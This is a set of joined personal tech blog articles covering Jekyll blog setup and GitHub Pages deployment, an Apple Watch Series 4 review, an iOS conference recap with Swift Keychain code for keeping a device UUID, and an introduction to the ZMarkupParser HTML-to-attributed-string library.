# The end of `jekyll-seo-tag` settings

google_analytics:
  id: G-6WZJENT8WR # fill in your Google Analytics ID
  # Google Analytics pageviews report settings
  pv:
    proxy_endpoint: # fill in the Google Analytics superProxy endpoint of Google App Engine
    cache_path: # the local PV cache data, friendly to visitors from GFW region

# Prefer color scheme setting.
#
# Note: Keep empty will follow the system prefer color by default,
# and there will be a toggle to switch the theme between dark and light
# on the bottom left of the sidebar.
#
# Available options:
#
#   light - Use the light color scheme
#   dark - Use the dark color scheme
#
theme_mode: # [light|dark]

# The CDN endpoint for images.
# Notice that once it is assigned, the CDN url
# will be added to all image (site avatar & posts' images) paths starting with '/'
#
# e.g. 'https://cdn.com'
img_cdn:

# the avatar on sidebar, support local or CORS resources
avatar: '/assets/images/zhgchgli.jpg'

# boolean type, the global switch for ToC in posts.
toc: true

comments:
  active: disqus # The global switch for posts comments, e.g., 'disqus'. Keep it empty means disable
  # The active options are as follows:
  disqus:
    shortname: zhgchgli # fill with the Disqus shortname. → https://help.disqus.com/en/articles/1717111-what-s-a-shortname
  # utterances settings → https://utteranc.es/
  utterances:
    repo: # <gh-username>/<repo>
    issue_term: # < url | pathname | title | ...>
  # Giscus options → https://giscus.app
  giscus:
    repo: # <gh-username>/<repo>
    repo_id:
    category:
    category_id:
    mapping: # optional, default to 'pathname'
    input_position: # optional, default to 'bottom'
    lang: # optional, default to the value of `site.lang`

# Self-hosted static assets, optional → https://github.com/cotes2020/chirpy-static-assets
assets:
  self_host:
    enabled: # boolean, keep empty means false
    # specify the Jekyll environment, empty means both
    # only works if `assets.self_host.enabled` is 'true'
    env: # [development|production]

paginate: 10

# ------------ The following options are not recommended to be modified ------------------
+
+kramdown:
+ syntax_highlighter: rouge
+ syntax_highlighter_opts: # Rouge Options › https://github.com/jneen/rouge#full-options
+ css_class: highlight
+ # default_lang: console
+ span:
+ line_numbers: false
+ block:
+ line_numbers: true
+ start_line: 1
+
+collections:
+ tabs:
+ output: true
+ sort_by: order
+
+defaults:
+ - scope:
+ path: '' # An empty string here means all files in the project
+ type: posts
+ values:
+ layout: post
+ comments: true # Enable comments in posts.
+ toc: true # Display TOC column in posts.
+ # DO NOT modify the following parameter unless you are confident enough
+ # to update the code of all other post links in this project.
+ permalink: /posts/:title/
+ - scope:
+ path: _drafts
+ values:
+ comments: false
+ - scope:
+ path: ''
+ type: tabs # see `site.collections`
+ values:
+ layout: page
+ permalink: /:title/
+ - scope:
+ path: assets/img/favicons
+ values:
+ swcache: true
+ - scope:
+ path: assets/js/dist
+ values:
+ swcache: true
+
+sass:
+ style: compressed
+
+compress_html:
+ clippings: all
+ comments: all
+ endings: all
+ profile: false
+ blanklines: false
+ ignore:
+ envs: [development]
+
+exclude:
+ - '*.gem'
+ - '*.gemspec'
+ - tools
+ - README.md
+ - LICENSE
+ - gulpfile.js
+ - node_modules
+ - package*.json
+
+jekyll-archives:
+ enabled: [categories, tags]
+ layouts:
+ category: category
+ tag: tag
+ permalinks:
+ tag: /tags/:name/
+ category: /categories/:name/
+
Please replace the settings according to the comments.
⚠️ After any changes to _config.yml, the local server needs to be restarted for them to take effect.
After the dependencies are installed, you can start the local website with bundle exec jekyll s:
Copy the URL http://127.0.0.1:4000/ and paste it into your browser to open it.
Local preview successful!
As long as this Terminal is open, the local website will be running. The Terminal will continuously update the website access logs, which is convenient for debugging.
We can open a new Terminal for other subsequent operations.
Depending on the template, there may be different folders and configuration files. The article file naming format is:
YYYY-MM-DD-article-file-name.md

Other directories like _includes, _layouts, _sites, _tabs… allow you to make advanced customizations.
Jekyll uses Liquid as the page template engine. The page template is composed in a manner similar to inheritance:
Users can freely customize pages. The engine will first check if the user has created a corresponding custom file for the page -> if not, it will check if the template has one -> if not, it will use the original Jekyll style.
So we can easily customize any page by creating a file with the same name in the corresponding directory!
Place new articles in the _posts/ directory. Use Visual Studio Code (free) or Typora (paid) to create Markdown files. Here we use Visual Studio Code as an example:
The file name format is YYYY-MM-DD-article-file-name.md

Article Content Top Meta:
---
layout: post
title: "Hello"
description: ZhgChgLi's first article
date: 2022-07-16 10:03:36 +0800
categories: Jekyll Life
author: ZhgChgLi
tags: [ios]
---
(Jekyll Life -> the Life directory under Jekyll)

Article Content:
Write using Markdown format:
---
layout: post
title: "Hello"
description: ZhgChgLi's first article
date: 2022-07-16 10:03:36 +0800
categories: Jekyll Life
author: ZhgChgLi
tags: [ios]
---
# HiHi!
Hello there
I am **ZhgChgLi**
Image:

> _If you have any questions or comments, feel free to [contact me](https://www.zhgchg.li/contact) ._
Results:
⚠️ Adjusting the article does not require restarting the website. The file changes will be rendered and displayed directly. If the modified content does not appear after a while, it may be due to an error in the article format causing rendering failure. You can check the Terminal for the reason.
With basic knowledge of Jekyll, we move forward by using the ZMediumToMarkdown tool to download existing articles from Medium and convert them to Markdown format to place in our Blog folder.
cd to the blog directory and run the following command to download all articles from the specified Medium user:
ZMediumToMarkdown -j your Medium account
Wait for all articles to download…
If you encounter any download issues or unexpected errors, feel free to contact me. This downloader was written by me (development insights), and I can help you solve the problem quickly and directly.
After the download is complete, you can preview the results on the local website.
Done!! We have seamlessly imported Medium articles into Jekyll!
You can check if the articles are formatted correctly and if there are any missing images. If there are any issues, feel free to report them to me for assistance in fixing them.
After confirming that the local preview content is correct, we need to push the content to the Github Repo.
Use the following Git commands in sequence:
git add .
git commit -m "update post"
git push
After pushing, go back to Github, and you will see that Actions are running CD:
Wait about 5 minutes…
Deployment completed!
After the initial deployment, you need to change the following settings:
Otherwise, when you visit the website, you will only see:
--- layout: home # Index page ---
After clicking “Save,” it will not take effect immediately. You need to go back to the “Actions” page and wait for the deployment again.
After redeployment is complete, you can successfully access the website:
Demo -> zhgchg.li
Now you also have a free Jekyll personal blog!!
Every time you push content to the Repo, it will trigger a redeployment. You need to wait for the deployment to succeed for the changes to take effect.
If you don’t like the zhgchgli0718.github.io Github URL, you can purchase a domain you like from Namecheap or register a free .tk domain from Dot.tk.
After purchasing the domain, go to the domain backend:
Add the following four A records:
A Record @ 185.199.108.153
A Record @ 185.199.109.153
A Record @ 185.199.110.153
A Record @ 185.199.111.153
After adding the settings in the domain backend, go back to Github Repo Settings:
In the Custom domain section, enter your domain, and then click “Save”.
After the DNS is connected, you can replace the original github.io address with zhgchg.li.
⚠️ DNS settings take at least 5 minutes ~ 72 hours to take effect. If it cannot be verified, please try again later.
Every time there is a new article, you have to manually run ZMediumToMarkdown on your computer and then push it to the Repo. Isn't that troublesome?
ZMediumToMarkdown actually also provides a convenient Github Action feature that allows you to free up your computer and automatically synchronize Medium articles to your website.
Go to the Actions settings of the Repo:
Click “New workflow”
Click “set up a workflow yourself”
Name the workflow file ZMediumToMarkdown.yml:
name: ZMediumToMarkdown
on:
  workflow_dispatch:
  schedule:
    - cron: "10 1 15 * *" # At 01:10 on day-of-month 15.

jobs:
  ZMediumToMarkdown:
    runs-on: ubuntu-latest
    steps:
      - name: ZMediumToMarkdown Automatic Bot
        uses: ZhgChgLi/ZMediumToMarkdown@main
        with:
          command: '-j your Medium account'
Click the top right “Start commit” -> “Commit new file”
Complete the creation of Github Action.
After creation, go back to Actions and you will see the ZMediumToMarkdown Action.
In addition to automatic execution at the scheduled time, you can also manually trigger execution by following these steps:
Actions -> ZMediumToMarkdown -> Run workflow -> Run workflow.
After execution, ZMediumToMarkdown will directly run the script to synchronize Medium articles to the Repo through Github Action’s machine:
After running, it will trigger a redeployment. Once the redeployment is complete, the latest content will appear on the website. 🚀
No manual operation required! This means you can continue to update Medium articles in the future, and the script will automatically help you sync the content from the cloud to your own website!
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Why buy it? Is it useful? What’s good about it? How to use it? & WatchOS APP recommendations
First, let me share my background with Apple products. I am not a die-hard Apple fan; my first encounter was in 2015 when I bought an iPhone 6 with my part-time job salary. Due to work needs, I started using a MacOS computer (Mac Mini) last year and bought my own MacBook Pro this year, and switched to an iPhone 8. The reasons I stepped into the Apple ecosystem are nothing more than:
[Updated 2019–05–02]: Another addition to the Apple family, AirPods 2 (Unboxing and Hands-on Experience Click Here)
Considering the above factors, I began to choose a suitable Apple Watch; excluding the strap material, there are three versions of the body to choose from:
I personally bought option 2: Aluminum case + possibly scratchable glass surface + GPS + Cellular, 44 mm
There are two sizes, 40mm and 44mm. Choose based on your wrist size; too large may not fit well, and heart rate detection may be inaccurate; too small may look odd.
Left 44mm/Right 40mm (Thanks to a colleague for the support)
If you can’t find something to compare, you can use a disposable contact lens case, approximately 44mm (actual measurement 44.5mm)
Here is a picture of my wrist for reference. If you are still unsure about the size, it’s best to visit a store and try it on (I initially aimed for 40mm, but found it too small after trying it on).
*Apple Watch 3 38mm and Apple Watch 4 40mm have the same size and interchangeable straps
*Apple Watch 3 42mm and Apple Watch 4 44mm have the same size and interchangeable straps
There are two options: aluminum case + possibly scratchable glass surface and stainless steel case + sapphire crystal glass. If budget allows, the latter is recommended; due to budget constraints, I chose the former. Why choose the stainless steel case + sapphire crystal glass version?
Although the body is heavier (you might feel it during exercise), it is easier to match with outfits in daily life. A leather or metal strap paired with a stainless steel body can complement business attire for a more consistent aesthetic. Switching to a sports strap for casual or athletic activities maintains elegance and versatility!
The sapphire crystal glass is extremely hard, so you don’t have to worry about scratches on the watch face. (Personal experience: My previous iPhone 6 was used without a case for over a year. I didn’t particularly protect it, just kept it in my pocket or on the table, and the screen got scratched up. However, the camera lens, which uses sapphire crystal glass, remained pristine.)
But I bought the regular version… If you search online for articles about Apple Watch screen protectors, you’ll find two camps: one supports using a screen protector to prevent scratches, and the other opposes it, arguing that it’s a matter of usage habits and that the watch isn’t so fragile. Do you see Rolex watches with screen protectors? Or, if you’re a laid-back user who just wants to use the watch as a consumable product, you won’t have this concern.
Personally, I have a bit of OCD and would be annoyed by scratches, so I support using a screen protector. Usage habits? I think only bumping into things is a bad habit; daily dust damage is hard to prevent.
If you also want to use a screen protector, here’s a suggestion: “Spend a bit more money to have someone apply it for you.” I usually apply screen protectors to my phone myself, so why do I recommend having someone else apply it for the Apple Watch?
This part was very frustrating for me. First, I bought a tempered glass protector from Tokyo* on Pchome ($399). It was a hard film with adhesive only on the edges, leaving a hollow space in the middle, making touch sensitivity very poor (seriously, did the manufacturer not test this?). So I removed it shortly after applying it.
The second attempt was with a g*r soft film ($100 for two pieces), which had full adhesive and adhered well, but it was difficult to apply without bubbles. I tried both pieces, but there were still some bubbles that were very noticeable, and it wasn’t oleophobic or hydrophobic, making it uncomfortable to use.
Finally, I spent $990 to have someone apply an h*a jelly adhesive glass protector (x豪包膜). It adhered well, had no bubbles, covered the entire screen, and was oleophobic and hydrophobic.
If you still want to try applying a screen protector yourself, look for a hydrogel film.
The feel after applying the screen protector is not as good as the original (personally, I rate it about 97 out of 100), and the screen will be slightly raised. It’s a personal choice!
Stainless steel version (thanks to my colleague for the support)
So, if your budget allows, I still recommend upgrading to the stainless steel version.
Screen protectors are prone to chipping at the edges. Without a protective case, my screen protectors usually get damaged within a month, costing $990 each time. I’ve replaced three so far, which is frustrating. Since using a protective case, it’s been four months, and the screen protector is still intact!
I recommend “at least using a bumper case,” any brand will do.
My painful lesson is that I wish I had known about protective cases earlier. It would have saved me a lot of money!
I’m on the fence about this. I personally bought the cellular version so I wouldn’t need to carry my phone while running. Considering I plan to use it for 2-3 years and don’t know what the future holds, I decided to upgrade. However, if your budget is limited and you don’t go out without your phone, you can just buy the WiFi version (price difference is $3600). Consider the following points:
Last week (2018/11/11), I went to 101 but couldn’t find the model I wanted, so I ordered online from China. I placed the order on 11/11, it shipped on 11/12, and it arrived on 11/15 as scheduled:
When I received it, I was so excited that I opened it right away without recording the process. You can refer to the unboxing videos online: Apple Watch Series 4 Experience Full-Screen Watch, Is It You? (Mainland China), Apple Watch Series 4 Complete Unboxing! Three Features Are Super Impressive (Taiwan)
Supplementary Unboxing Picture
The unboxing part ends here…
Pairing and basic settings won’t be elaborated here; you can refer to the unboxing articles above. Here, we assume you have already set up and started using your Apple Watch.
Button Diagram — Apple Official Support Center
(The terms "Digital Crown" and "Side Button" below follow Apple's official naming.)
Button Operations:
This is important, so it’s placed first. How to take a screenshot on Apple Watch: Open the “Watch” app on your “iPhone” -> “My Watch” tab -> go to “General” -> “Enable Screenshots” and turn it on.
On the Apple Watch, press the Digital Crown and the Side Button simultaneously. When the screen flashes, the screenshot is taken. You can then find the screenshot in the Photos app on your iPhone!
The built-in speaker on the watch can only be used for calls and playing alert sounds, not for playing music. If you feel uncomfortable talking on the watch in public, you can use Bluetooth earphones.
Please refer to the official document
The watch uses Bluetooth when near the phone and WiFi when the distance is too far.
Left indicates disconnected, right indicates connected
By default, the watch mirrors the notification settings of the apps on the iPhone. You can also specifically turn off notifications for certain apps so they don’t get sent to the watch (open the “Watch” app on your “iPhone” -> “My Watch” tab -> “Notifications” -> scroll to the bottom to adjust for each app).
Feel free to play around and place whatever you think is important or looks good; I put “information I always want to know when I look at my watch” on the watch face, and you can also add multiple watch faces for switching.
You read that right, Apple Watch also has a flashlight; pull up the menu from the bottom of the watch face page to find the “Flashlight” button, and you can swipe left or right to change the screen color; yes, it’s just a high-brightness screen color!
What’s special is that there is also a strobe mode:
Making night activities safer!
“Silent Mode” - All notifications are silent, no vibration, no screen lighting, only shown in the notification center.
“Theater Mode” - Raising the wrist will not wake the screen, you need to tap the screen to wake it.
“Water Lock” - Locks the screen touch, you need to turn the digital crown to unlock, and the speaker will automatically play sound to expel water after unlocking.
“Airplane Mode” - Turns off all external connections.
“Power Reserve Mode” - Really saves power! Only the time display function remains when pressing the digital crown, everything else is turned off, almost like being off; to exit Power Reserve Mode, press and hold the side button (same as turning on).
In all these modes, alarms and countdown functions will still sound (Power Reserve Mode will force the device to turn on).
Just raise your wrist, and after the screen lights up, you can directly speak to use Siri! No need to say “Hey! Siri” (e.g., after raising your wrist, directly say “Tomorrow’s weather”). You can also use Siri when your phone is at a distance (e.g., when hanging clothes).
[2019-05-02 Update]: For an even better Siri experience, refer to AirPods 2 Unboxing and Hands-on Experience for the Siri section. With AirPods 2, you can use Siri directly with the headphones on, without even raising your wrist.
The built-in AQI seems not to support the Taiwan region. You need to search for “Air Matters” in the “App Store”, download and install it, then open it. After that, go to the watch face design complications section and select “Air Matters”.
If it keeps failing to enable, first ensure your Apple ID has Two-Factor Authentication enabled (not Two-Step Verification) or try restarting your computer!
p.s. My company’s Mac Mini couldn’t enable it until I restarted it.
By default, it shows favorites from your iPhone. Open “Photos” on your iPhone, tap the “heart” on the photos you want to transfer to your watch, and they will appear.
Activity records have three rings and three goals daily:
For details, check the “Health” APP on your iPhone for a detailed explanation.
Daily achievement records will prompt, and you can also press hard on the “Activity” APP on Apple Watch to adjust activity goal values (default is 360 active calories per day).
Physical training part: For running, I use Nike+ Run Club instead of the built-in one. Last week, I went cycling and tried the built-in physical training -> "Outdoor Cycling" to record. It records altitude/distance/time/path/heart rate. Awesome!
Currently, it only supports Apple Map, Google Map is not supported yet. Open “Maps” to search or select the company or home address set in personal information (Source: Contacts -> My Card) or contact information or manually input the destination. After starting navigation, each turn is a card that automatically flips based on movement. You can rotate to view, and click to see the map content. When there are 40 meters left, it will vibrate to alert you. Press hard to end navigation.
This part just transfers your phone’s Apple Map information to the watch (when the watch is navigating, the phone’s navigation will also automatically open).
Actual usage experience: Apple Map has very few landmarks and is hard to search. It seems to only guide main roads. Even though there are dual lanes, faster, and no traffic routes, it doesn’t guide… So still looking forward to Google Map updates. For now, just use this as a temporary solution.
Here is a Siri shortcut: Open Google Map item using Apple Map
Open “Camera” on Apple Watch, and the phone’s camera will also open. You can use the watch to control the phone’s camera for taking photos and videos. Press hard to switch lenses/settings.
On the watch face page, swipe up from the bottom to find a “phone vibrating icon.” Click it, and the phone will make a sound!
p.s. The reverse function (finding the watch with the phone) is not available. If lost, please use “Find iPhone” to locate it.
I think this is a bug…
In messages, press hard on the “microphone” or “handwriting” icon to bring up the menu > “Select Language” -> “Chinese”
Another method is to open “iPhone” -> “Settings” -> “General” -> “Keyboard” -> “Dictation” -> “Dictation Languages” -> check only “Mandarin”
This way, your voice input will only understand Mandarin, and the phone part will also be affected.
Open the “Watch” APP on “iPhone” -> “My Watch” page -> Breathe -> Turn off Breathe reminders
Open the “Watch” APP on “iPhone” -> “My Watch” page -> Activity -> Turn off Stand reminders
Open the “Watch” APP on “iPhone” -> “My Watch” page -> Passcode -> Simple Passcode -> Turn off -> then you can set a 6-digit passcode
No.
Compared to a colleague’s Apple Watch S3, the S4 opens apps almost without loading, and it boots up quickly. You can refer to this video for actual tests: 【Latest】4th Generation Apple Watch Series 4 Speed Test Volume Comparison
I only wear it from waking up to before showering, not while sleeping (afraid of hitting the wall unconsciously). I take it off to charge before showering.
Wearing it for about 15 hours a day, if not playing with it constantly, about 65% battery left. It can last, barely needing a charge every two days.
*The first charge may take longer. *Battery performance may not be optimal in the first few days, causing higher consumption.
Air Matters (Free): Supports watch face complications for AQI information.
秒速記帳 ($60): Fast accounting software, supports dial complications. I have tried this and C*Money, but C*Money costs $120 and the interface is too complicated for me to use. So I recommend this one.
Bus+ (Free): Bus information query. I originally used Taipei Bus but that app does not support Apple Watch, so I had to give it up. Bus+ works differently from Taipei Bus; Bus+ is station-based. My personal setup is to categorize frequently used locations (home/company/MRT station) and add the bus routes that pass through.
Bus+
Nike+ Run Club (Free): Running record app.
Shazam (Free): Press to identify music (although you can also ask Siri directly). There is another app called SoundHound, but in my personal tests, Shazam is faster.
雙北市Ubike+ (Free): Check the number of available and parking spots at nearby/favorite Ubike stations.
錄音機 (Free): Quickly use Apple Watch to record and transfer to your phone.
倒數日 (Free): View countdowns for anniversaries/future events.
Advanced Calculator For Apple Watch OS (Free): Use a small calculator on Apple Watch.
Line, Spotify…etc.
I’ve been wearing it for almost two weeks now. From the initial excitement to now, it has seamlessly integrated into my life. So far, the benefits to my daily life include: unlocking my MAC without typing a long password (company policy requires logging out when leaving the desk), checking the weather instantly, navigation, app notifications, and monitoring heart rate for health. That’s about it; there are too few supported apps and functions.
Has the time spent on my phone decreased? Not particularly, because I still prefer to reply to notifications on my phone. Replying on the watch requires voice input, which is awkward in public, or handwriting, which is very slow. Moreover, many apps do not support Apple Watch.
Is it really worth starting at $12,900? There are many better options for watches over $10,000, but if you want to integrate with the Apple ecosystem, there’s only one choice. If you just want to buy a luxury watch, you don’t need an Apple Watch. If you want a watch that can handle daily tasks, you can consider it. If you want a luxury item + daily task handler, you can consider the stainless steel or even Hermès version!
Since purchasing, I’ve had thoughts of returning it. Spending $17,500 on a watch seems not worth it, but it does help with daily life. Is this help worth $17,500? I don’t think so at the moment. I’ll reevaluate when the Apple Watch app ecosystem is more developed. For now, it’s a luxury item XD, bought for pleasure, trendiness, and impulse.
Other items are for you to experience on your own.
-
Please see the next article » AirPods 2 Unboxing and Hands-on Experience
Please see Let’s Make an Apple Watch App! (Swift)
Please see First Experience with Smart Home — Apple HomeKit & Xiaomi Mijia
For details, please see this article
nomad Apple Watch Strap
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
iPlayground 2018 Recap & All About UUID
Last Saturday and Sunday, I attended the iPlayground Apple software developer conference. This event was recommended by a colleague, and I wasn’t familiar with it before attending.
Over the two days, the event and schedule were smooth, and the agenda included:
The Bicycle Project left a deep impression. Using an iPhone as a sensor to detect bicycle pedal rotation, the presenter switched slides while riding a bicycle on stage (the main goal was to create an open-source version of Zwift, sharing many pitfalls such as Client/Server communication, latency issues, and magnetic interference).
The session on Decaying Dirty Code resonated deeply, bringing a knowing smile. Technical debt accumulates this way: rushed development schedules lead to quick but poorly structured solutions, and subsequent developers don't have time to refactor, causing the debt to pile up. Eventually, the only solution might be to start over.
Testing (Design Patterns in XCUITest) by a senior from KKBOX was very open, sharing their methods, code examples, encountered issues, and solutions. This session was particularly beneficial for our work. Testing is an area I’ve always wanted to strengthen, and now I can study it thoroughly.
Listening to the Lightning Talks made me want to share too 😂. I'll prepare better next time!
The official party afterward was sincere, with great food and drinks. Listening to the seniors’ heartfelt words was both relaxing and informative, enhancing many soft skills.
NTU Backstage Cafe
I learned that this was the first edition, and I was truly honored to participate. Kudos to all the staff and speakers!
The purpose of attending conferences is to: broaden horizons, absorb new knowledge, understand the ecosystem, and explore areas you wouldn’t normally encounter, and deepen expertise, by identifying any overlooked aspects or discovering new methods in familiar areas.
I took many notes to study and savor later.
After the conference, I immediately applied what I learned to our app. This session was led by senior Zonble, who has been writing from iPhone OS 2 to iOS 12, which is impressive. I started from iOS 11/Swift 4, so I missed the turbulent times when Apple changed APIs.
It’s reasonable that UUIDs went from accessible to restricted. If used for good purposes: identifying user devices, advertising, or third-party operations, it can be beneficial. But if misused, it can track and profile users (e.g., knowing you often travel, have kids, and live in Taipei based on installed apps like travel, Taipei bus, BMW, and baby care apps). Combined with personal data entered in apps, the potential misuse is concerning.
However, this also affects many legitimate users. Using UUIDs for user data decryption keys or device identification is significantly impacted. I admire the engineers of that era; the impact would have caused complaints from bosses and users, requiring quick alternative solutions.
This article focuses on obtaining UUIDs to identify unique devices. For alternatives to knowing which apps a user has installed, consider these keywords: UIPasteboard pasteboardWithName: create: (using the clipboard to share between apps), canOpenURL: info.plist LSApplicationQueriesSchemes (using canOpenURL to check if an app is installed, listing up to 50 entries in info.plist)
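As a quick illustration of the canOpenURL keyword above, here is a minimal sketch of my own (the "fb" scheme is just an example, not from the original talk):

import UIKit

// A minimal sketch: checking whether another app is installed via its URL scheme.
// The scheme to query (e.g. "fb") must also be listed under LSApplicationQueriesSchemes
// in Info.plist, and Apple limits that list to 50 entries.
func isAppInstalled(scheme: String) -> Bool {
    guard let url = URL(string: "\(scheme)://") else { return false }
    return UIApplication.shared.canOpenURL(url)
}

// isAppInstalled(scheme: "fb") // true if the Facebook app is installed and "fb" is whitelisted

Back to the main topic of this article, obtaining a UUID to identify the device: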
let DEVICE_UUID:String = UIDevice.current.identifierForVendor?.uuidString ?? UUID().uuidString
Note: When all apps from the same vendor are removed and then reinstalled, a new UUID will be generated (e.g., if both com.518.work and com.518.job are deleted and then com.518.work is reinstalled, a new UUID is generated). Similarly, if you have only one app, deleting and reinstalling it will also generate a new UUID.
Due to this characteristic, our company’s other apps use Key-Chain to solve this problem. After listening to the advice of experienced speakers, we have verified that this approach is correct!
The process is as follows:
When the Key-Chain UUID field has a value, retrieve it; otherwise, get the identifierForVendor (IDFV) UUID value and write it back
Key-Chain writing method:
if let data = DEVICE_UUID.data(using: .utf8) {
    let query = [
        kSecClass as String : kSecClassGenericPassword as String,
        kSecAttrAccount as String : "DEVICE_UUID",
        kSecValueData as String : data ] as [String : Any]

    SecItemDelete(query as CFDictionary)
    SecItemAdd(query as CFDictionary, nil)
}
Key-Chain reading method:
let query = [
    kSecClass as String : kSecClassGenericPassword,
    kSecAttrAccount as String : "DEVICE_UUID",
    kSecReturnData as String : kCFBooleanTrue,
    kSecMatchLimit as String : kSecMatchLimitOne ] as [String : Any]

var dataTypeRef: AnyObject? = nil
let status: OSStatus = SecItemCopyMatching(query as CFDictionary, &dataTypeRef)
if status == noErr, let dataTypeRef = dataTypeRef as? Data, let uuid = String(data: dataTypeRef, encoding: .utf8) {
    //uuid
}
If you find Key-Chain operations too cumbersome, you can encapsulate them yourself or use third-party libraries.
let DEVICE_UUID:String = {
    let query = [
        kSecClass as String : kSecClassGenericPassword,
        kSecAttrAccount as String : "DEVICE_UUID",
        kSecReturnData as String : kCFBooleanTrue,
        kSecMatchLimit as String : kSecMatchLimitOne ] as [String : Any]

    var dataTypeRef: AnyObject? = nil
    let status: OSStatus = SecItemCopyMatching(query as CFDictionary, &dataTypeRef)
    if status == noErr, let dataTypeRef = dataTypeRef as? Data, let uuid = String(data: dataTypeRef, encoding: .utf8) {
        return uuid
    } else {
        let DEVICE_UUID:String = UIDevice.current.identifierForVendor?.uuidString ?? UUID().uuidString
        if let data = DEVICE_UUID.data(using: .utf8) {
            let query = [
                kSecClass as String : kSecClassGenericPassword as String,
                kSecAttrAccount as String : "DEVICE_UUID",
                kSecValueData as String : data ] as [String : Any]

            SecItemDelete(query as CFDictionary)
            SecItemAdd(query as CFDictionary, nil)
        }
        return DEVICE_UUID
    }
}()
Because I need to reference it in other Extension Targets, I wrapped it directly into a closure-initialized constant for use.
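If you also want the Keychain item itself to be readable from an App Extension target, one possible approach, not covered in the article and purely an assumption here, is to enable the Keychain Sharing capability and add an access group to the query. The access group string below is a placeholder:

// A minimal sketch, assuming the Keychain Sharing capability is enabled for both targets.
// "TEAMID.com.example.shared" is a hypothetical access group, not from the original project.
let sharedQuery = [
    kSecClass as String : kSecClassGenericPassword,
    kSecAttrAccount as String : "DEVICE_UUID",
    kSecAttrAccessGroup as String : "TEAMID.com.example.shared",
    kSecReturnData as String : kCFBooleanTrue as Any,
    kSecMatchLimit as String : kSecMatchLimitOne ] as [String : Any]

var sharedResult: AnyObject? = nil
let sharedStatus = SecItemCopyMatching(sharedQuery as CFDictionary, &sharedResult)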
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Convert HTML String to NSAttributedString with corresponding Key style settings
- Auto-corrects malformed HTML, e.g. <br> -> <br/>, <b>Bold<i>Bold+Italic</b>Italic</i> -> <b>Bold<i>Bold+Italic</i></b><i>Italic</i>, and <Congratulation!> -> <Congratulation!> (treated as a plain string)
- Customizable styles for tags, e.g. <b></b> -> weight: .semibold & underline: 1
- Extendable tags, e.g. <zhgchgli></zhgchgli>, mapped into the styles you want
- HTML style attribute support: HTML can specify text styles through the style attribute, and this tool also supports styles specified there, e.g. <b style="font-size: 20px"></b> -> bold + font size 20 px
- Supports <img> images, <ul> lists, <table> tables, etc., like NSAttributedString.DocumentType.html
*Additionally, NSAttributedString.DocumentType.html crashes with strings longer than 54,600+ characters (EXC_BAD_ACCESS).
You can directly download the project, open ZMarkupParser.xcworkspace, select the ZMarkupParser-Demo target, and Build & Run to test the effects.
Supports SPM/Cocoapods, please refer to the Readme.
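For example, with Swift Package Manager the dependency can be declared roughly as follows; this is only a minimal sketch, and the package name, target name, platform, and version are assumptions, so check the Readme for the actual requirements:

// swift-tools-version:5.5
// Package.swift — a minimal sketch; "MyApp", the platform, and the version are placeholders.
import PackageDescription

let package = Package(
    name: "MyApp",
    platforms: [.iOS(.v13)],
    dependencies: [
        .package(url: "https://github.com/ZhgChgLi/ZMarkupParser.git", from: "1.0.0")
    ],
    targets: [
        .target(
            name: "MyApp",
            dependencies: ["ZMarkupParser"]
        )
    ]
)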
MarkupStyle/MarkupStyleColor/MarkupStyleParagraphStyle, corresponding to the encapsulation of NSAttributedString.Key.
var font: MarkupStyleFont
var paragraphStyle: MarkupStyleParagraphStyle
var foregroundColor: MarkupStyleColor? = nil
var backgroundColor: MarkupStyleColor? = nil
var ligature: NSNumber? = nil
var kern: NSNumber? = nil
var tracking: NSNumber? = nil
var strikethroughStyle: NSUnderlineStyle? = nil
var underlineStyle: NSUnderlineStyle? = nil
var strokeColor: MarkupStyleColor? = nil
var strokeWidth: NSNumber? = nil
var shadow: NSShadow? = nil
var textEffect: String? = nil
var attachment: NSTextAttachment? = nil
var link: URL? = nil
var baselineOffset: NSNumber? = nil
var underlineColor: MarkupStyleColor? = nil
var strikethroughColor: MarkupStyleColor? = nil
var obliqueness: NSNumber? = nil
var expansion: NSNumber? = nil
var writingDirection: NSNumber? = nil
var verticalGlyphForm: NSNumber? = nil
...
You can declare the styles you want to apply to the corresponding HTML tags:
let myStyle = MarkupStyle(font: MarkupStyleFont(size: 13), backgroundColor: MarkupStyleColor(name: .aquamarine))
Declare the HTML tags to be rendered and the corresponding Markup Style. The currently predefined HTML tag names are as follows:
A_HTMLTagName(), // <a></a>
B_HTMLTagName(), // <b></b>
BR_HTMLTagName(), // <br></br>
DIV_HTMLTagName(), // <div></div>
HR_HTMLTagName(), // <hr></hr>
I_HTMLTagName(), // <i></i>
LI_HTMLTagName(), // <li></li>
OL_HTMLTagName(), // <ol></ol>
P_HTMLTagName(), // <p></p>
SPAN_HTMLTagName(), // <span></span>
STRONG_HTMLTagName(), // <strong></strong>
U_HTMLTagName(), // <u></u>
UL_HTMLTagName(), // <ul></ul>
DEL_HTMLTagName(), // <del></del>
IMG_HTMLTagName(handler: ZNSTextAttachmentHandler), // <img> and image downloader
TR_HTMLTagName(), // <tr>
TD_HTMLTagName(), // <td>
TH_HTMLTagName(), // <th>
...and more
...
This way, when parsing the <a> tag, it will apply the specified MarkupStyle.
Extend HTMLTagName:
let zhgchgli = ExtendTagName("zhgchgli")
As mentioned earlier, HTML supports specifying styles from the Style Attribute. Here, it is abstracted to specify supported styles and extensions. The currently predefined HTML Style Attributes are as follows:
ColorHTMLTagStyleAttribute(), // color
BackgroundColorHTMLTagStyleAttribute(), // background-color
FontSizeHTMLTagStyleAttribute(), // font-size
FontWeightHTMLTagStyleAttribute(), // font-weight
LineHeightHTMLTagStyleAttribute(), // line-height
WordSpacingHTMLTagStyleAttribute(), // word-spacing
...
Extend Style Attribute:
ExtendHTMLTagStyleAttribute(styleName: "text-decoration", render: { value in
    var newStyle = MarkupStyle()
    if value == "underline" {
        newStyle.underline = NSUnderlineStyle.single
    } else {
        // ...
    }
    return newStyle
})
import ZMarkupParser

let parser = ZHTMLParserBuilder.initWithDefault().set(rootStyle: MarkupStyle(font: MarkupStyleFont(size: 13))).build()
initWithDefault will automatically add predefined HTML Tag Names & default corresponding MarkupStyles as well as predefined Style Attributes.
set(rootStyle:) can specify the default style for the entire string, or it can be left unspecified.
